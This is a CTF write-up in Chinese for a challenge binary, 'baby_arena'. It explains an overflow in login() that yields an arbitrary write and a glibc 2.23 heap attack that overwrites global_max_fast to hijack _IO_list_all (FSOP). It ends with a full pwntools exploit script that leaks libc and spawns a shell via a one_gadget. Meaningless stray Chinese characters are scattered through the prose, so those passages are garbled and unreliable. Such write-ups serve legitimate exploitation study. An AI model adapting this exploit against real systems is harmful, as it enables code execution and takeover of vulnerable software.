漏洞位置

在login函數(shù)中v3變量大小只有8武学，輸入了0x10造成了溢出页衙，溢出到v4造成了任意地址寫簇宽，不過只能寫成admin或者clientele匹摇。

login

漏洞利用

首先有個alloc_check函數(shù)限制了申請的堆大小在0x96和0x176F之間，也就是在fastbin之外狮暑。

alloc_check

delete

• global_max_fast是main_arena中控制最大fastbin大小的變量歉糜。
• fastbin在根據(jù)大小不同乘寒，分別鏈到main_arena中的fastbinY數(shù)組中，數(shù)組大小為10匪补，若修改global_max_fast之后伞辛，更大的fastbin將會根據(jù)偏移來計算鏈到的位置，而超出原本fastbinY規(guī)定的位置夯缺，到達bins甚至更后面的File結(jié)構(gòu)體蚤氏。
• FSOP貼個鏈接吧，大概就是當程序在干下列事情之一時：
  1.當libc執(zhí)行abort流程時
  2.當執(zhí)行exit函數(shù)時
  3.當執(zhí)行流從main函數(shù)返回時
  會調(diào)用_IO_flush_all_lockp函數(shù)踊兜，在調(diào)用次函數(shù)時竿滨，當滿足以下條件時：
  1._IO_FILE -> _mode <= 0
  2._IO_FILE -> _IO_write_ptr > _IO_FILE -> _IO_write_base
  又會執(zhí)行_IO_OVERFLOW(_IO_FILE_plus , EOF)函數(shù)，其中提到的我們劫持_IO_list_all的指針后(_IO_list_all中存放了_IO_FILE的值)，下面的_mode于游、_IO_write_ptr毁葱、_IO_write_base皆是該結(jié)構(gòu)體上的變量，其中_IO_OVERFLOW函數(shù)贰剥，是存在于_IO_FILE_plus.vtable上偏移為0x18的函數(shù)指針倾剿，_IO_FILE_plus.vtable也是在該結(jié)構(gòu)提上的指針。以上變量自己按著偏移去構(gòu)造就行了蚌成。值得注意的是前痘，當通過chunk劫持了_IO_list_all的指針后，由于指針指的是堆快的首地址笑陈，所以算偏移時需要減去堆頭的大小际度。

my-exp.py

from pwn import *
local = 1
one_gadget = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
if local:
    p = process('./baby_arena')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    print 'time is up;'

def create(size , note):
    p.recvuntil('exit\n')
    p.sendline('1')
    p.recvuntil('size\n')
    p.sendline(str(size))
    p.recvuntil('note\n')
    p.sendline(note)
    p.recvuntil('is\n')
    note_is = p.recvuntil('\n')[:-1]
    p.recvuntil('successed\n')
    return note_is

def delete(id):
    p.recvuntil('exit\n')
    p.sendline('2')
    p.recvuntil('id:\n')
    p.sendline(str(id))
    p.recvuntil('order!\n')

def login(name , is_admin):
    p.recvuntil('exit\n')
    p.sendline('3')
    p.recvuntil('name\n')
    p.sendline(name)
    p.recvuntil('admin\n')
    p.sendline(str(is_admin))

def debug():
    print pidof(p)[0]
    raw_input()

#make fake_file to trigger FSOP
fake_file = 'a' * (0x20 - 0x10)     #padding
fake_file += p64(0)                 #write_base => offset_0x20
fake_file += p64(1)                 #write_ptr  => offset_0x28
fake_file += 'b' * (0xb8 - 0x28)    #padding
fake_file += p64(0)                 #mode       => offset_0xc0
fake_file += 'c' * (0xd0 - 0xc0)    #padding
fake_file += p64(0x6020b0 - 0x18)   #vtable     => offset_0xd8

#leak libc_base and get some important addr
create(0xa0 , '1' * 0xa0)           #0
create(0xa0 , '2' * 0xa0)           #1
create(0x1400 , fake_file)          #2  free to fastbin and overwrite IO_list_all
delete(0)
leak = create(0xa0 , '3' * 8)
libc.address = u64(leak[8:].ljust(8 , '\x00')) - 0x3c4b78
global_max_fast_addr = libc.address + 0x3c67f8
IO_list_all_addr = libc.symbols['_IO_list_all']
success('libc_base => ' + hex(libc.address))
success('global_max_fast => ' + hex(global_max_fast_addr))
success('IO_list_all => ' + hex(IO_list_all_addr))

#overwrite global_mas_fast and free chunk2 to overwrite IO_list_all to fake_file 
login(p64(libc.address + one_gadget[1]) + p64(global_max_fast_addr - 8) , 0)
p.recvuntil('wrong choice\n')
delete(2)
#debug()

#exit() and exec one_gadget to get shell
p.recv(1024)
p.sendline('4')
p.interactive()